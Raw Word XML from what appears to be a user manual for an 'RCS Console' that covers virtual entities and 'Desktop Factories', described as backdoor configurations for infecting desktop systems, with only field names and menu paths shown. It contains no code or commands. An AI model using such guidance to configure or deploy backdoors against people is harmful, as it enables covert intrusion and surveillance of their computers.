            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity you’re about to create.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00B24E33">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00B24E33">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00B24E33">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the Virtual </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ntity is created you can access the </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntity page (double-click) providing details such as pictures and URLs, as shown in the image below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00B24E33">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36"/>
        <w:gridCol w:w="4435"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B24E33" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B" w:rsidP="00057420">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00057420" w:rsidRDefault="0010013A" w:rsidP="0010013A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.6</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intelligence &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Entity </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Virtual)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1049" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:115.5pt;z-index:251692032;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId61" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1049" DrawAspect="Content" ObjectID="_1446455347" r:id="rId62"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the entity’s URL.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00B24E33">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a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00B24E33">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005037B0" w:rsidRDefault="005037B0" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="005037B0" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId63"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B" w:rsidP="00C9792B">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc372642485"/>
      <w:r w:rsidRPr="00754335">
        <w:lastRenderedPageBreak/>
        <w:t>Desktop Factories Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="005037B0" w:rsidRPr="00754335" w:rsidRDefault="005037B0" w:rsidP="00C9792B">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc372642486"/>
      <w:r w:rsidRPr="00754335">
        <w:t xml:space="preserve">Desktop </w:t>
      </w:r>
      <w:r w:rsidR="000450A6" w:rsidRPr="00754335">
        <w:t>Factories Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="005037B0" w:rsidRDefault="005037B0" w:rsidP="005037B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C701A" w:rsidRDefault="00A230E6" w:rsidP="000C701A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Desktop factories allow Technicians to create RCS backdoor configurations for desktop platforms infections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765661" w:rsidRDefault="00765661" w:rsidP="000C701A">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267"/>
        <w:gridCol w:w="8285"/>
      </w:tblGrid>
      <w:tr w:rsidR="00765661" w:rsidTr="00F2261C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00765661" w:rsidRDefault="00F2261C" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="810" w:dyaOrig="1020">
                <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:43.5pt;height:50.25pt" o:ole="">
                  <v:imagedata r:id="rId64" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1032" DrawAspect="Content" ObjectID="_1446455247" r:id="rId65"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00765661" w:rsidRDefault="00765661" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00765661" w:rsidRPr="00671455" w:rsidRDefault="00765661" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Desktop Factory</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00765661" w:rsidRDefault="007D3122" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A Desktop Factory is a backdoor configuration for desktop platforms infection.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00765661" w:rsidRPr="00671455" w:rsidRDefault="007D3122" w:rsidP="007D3122">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>With the same factory it’s possible to infect multiple systems based on multiple desktop platforms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00765661" w:rsidRDefault="00765661" w:rsidP="000C701A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00765661" w:rsidRDefault="00765661" w:rsidP="000C701A">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5092"/>
      </w:tblGrid>
      <w:tr w:rsidR="0059452D" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C9792B" w:rsidRDefault="003A4380" w:rsidP="0059452D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1085" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:-3.65pt;margin-top:0;width:203.8pt;height:121.9pt;z-index:251720704;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId66" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1085" DrawAspect="Content" ObjectID="_1446455348" r:id="rId67"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C9792B" w:rsidRDefault="0010013A" w:rsidP="0059452D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0059452D" w:rsidRPr="00057420" w:rsidRDefault="00C9792B" w:rsidP="0059452D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt; New Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059452D" w:rsidRDefault="0059452D" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5092" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0059452D" w:rsidRPr="00240B6F" w:rsidRDefault="0059452D" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0059452D" w:rsidRPr="00240B6F" w:rsidRDefault="0059452D" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0059452D" w:rsidRPr="00240B6F" w:rsidRDefault="0059452D" w:rsidP="00D86157">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w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>actory</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0059452D" w:rsidRPr="00240B6F" w:rsidRDefault="0059452D" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">to be used for </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>stor</w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ing</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> additional information about the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>actory.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0059452D" w:rsidRPr="00240B6F" w:rsidRDefault="0059452D" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>actory</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> you’re about to create.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
